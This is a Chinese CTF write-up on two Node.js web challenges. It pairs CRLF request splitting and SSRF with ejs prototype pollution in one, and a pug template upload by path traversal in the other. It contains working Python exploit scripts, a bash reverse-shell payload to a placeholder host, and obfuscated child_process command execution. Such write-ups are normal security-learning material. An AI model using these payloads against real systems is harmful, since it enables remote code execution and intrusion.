[西湖论剑 2022]real_ez_node 复盘

半年前说要学node 到现在还是b动静没有

[西湖论剑 2022]real_ez_node

给了源码 node8.1.2
初步看下来要ssrf打原型链污染
/路由下是this is ejs
可以往ejs的原型链污染去考虑

但是问题来了
上哪儿去ssrf
/curl路由只有参数q可控
在这里插入图片描述
考虑CRLF拆分攻击
在这里插入图片描述
污染点在
在这里插入图片描述
手动POST /copy
拿到数据包删掉点无关紧要的东西
然后就可以构造了
_tmp1;global.process.mainModule.require('child_process').exec('/bin/bash -c \\"/bin/bash -i >&/dev/tcp/xxx.xxx.xxx.xxx/9000 0>&1\\"');var __tmp2

import urllib.parse
import requests

payload = '''HTTP/1.1

POST /copy HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/json
Content-Length: 192

{"constructor.prototype.outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('/bin/bash -c \\"/bin/bash -i >&/dev/tcp/xxx.xxx.xxx.xxx/9000 0>&1\\"');var __tmp2"}

GET /'''
payload = payload.replace(' ', '\u0120').replace('\n', '\u010d\u010a').replace('{', '\u017b').replace(
    '}', '\u017d').replace('"', '\u0122').replace('\'', '\u0127').replace('>', '\u013e').replace('\\', '\u015c')


payload = urllib.parse.quote(payload)

print(payload)
url = "http://node4.anna.nssctf.cn:28814/curl?q="
requests.get(url+payload)

[GYCTF2020]Node Game

这里顺便给[GYCTF2020]Node Game做了
在这里插入图片描述
模板是pug
/core可以ssrf
/file_upload有一个文件上传
根路径下传action参数可以访问任意模板

那么可以考虑上传一个恶意的pug然后根目录去访问
在这里插入图片描述
上传路径在uploads下 可以通过构造mimetype来路径穿越

先抓一个上传的包

- x = eval("glob"+"al.proce"+"ss.mainMo"+"dule.re"+"quire('child_'+'pro'+'cess')['ex'+'ecSync']('ls')")
- return x

完事改脚本

import urllib.parse
import requests

# payload = '''HTTP/1.1

# POST /file_upload HTTP/1.1
# Host: 127.0.0.1:8081
# Content-Length: 331
# Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCOrILUaqwgT7T9GT

# ------WebKitFormBoundaryCOrILUaqwgT7T9GT
# Content-Disposition: form-data; name="file"; filename="shell.pug"
# Content-Type: ../template

# -var x = eval("glob"+"al.proce"+"ss.mainMo"+"dule.re"+"quire('child_'+'pro'+'cess')['ex'+'ecSync']('cat /flag.txt').toString()")
# -return x
# ------WebKitFormBoundaryCOrILUaqwgT7T9GT--

# GET /'''
payload ='''HTTP/1.1

POST /file_upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryO9LPoNAg9lWRUItA
Content-Length: 301
Host: 127.0.0.1:8081

------WebKitFormBoundaryO9LPoNAg9lWRUItA
Content-Disposition: form-data; name="file"; filename="shell.pug"
Content-Type: ../template

- x = eval("glob"+"al.proce"+"ss.mainMo"+"dule.re"+"quire('child_'+'pro'+'cess')['ex'+'ecSync']('ls')")
- return x
------WebKitFormBoundaryO9LPoNAg9lWRUItA--


GET /'''
payload = payload.replace(' ', '\u0120').replace('\n', '\u010d\u010a').replace('{', '\u017b').replace(
    '}', '\u017d').replace('"', '\u0122').replace('\'', '\u0127').replace('>', '\u013e').replace('\\', '\u015c')


payload = urllib.parse.quote(payload)


url = "http://4b5ed9ad-6e1e-4336-91a3-4bffc35ea376.node5.buuoj.cn:81/core?q="
print(url+payload)
res = requests.get(url+payload)
print(res.text)


此时访问/?action=shell
在这里插入图片描述
修改pug

- x = eval("glob"+"al.proce"+"ss.mainMo"+"dule.re"+"quire('child_'+'pro'+'cess')['ex'+'ecSync']('cat f*')")
- return x

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值
>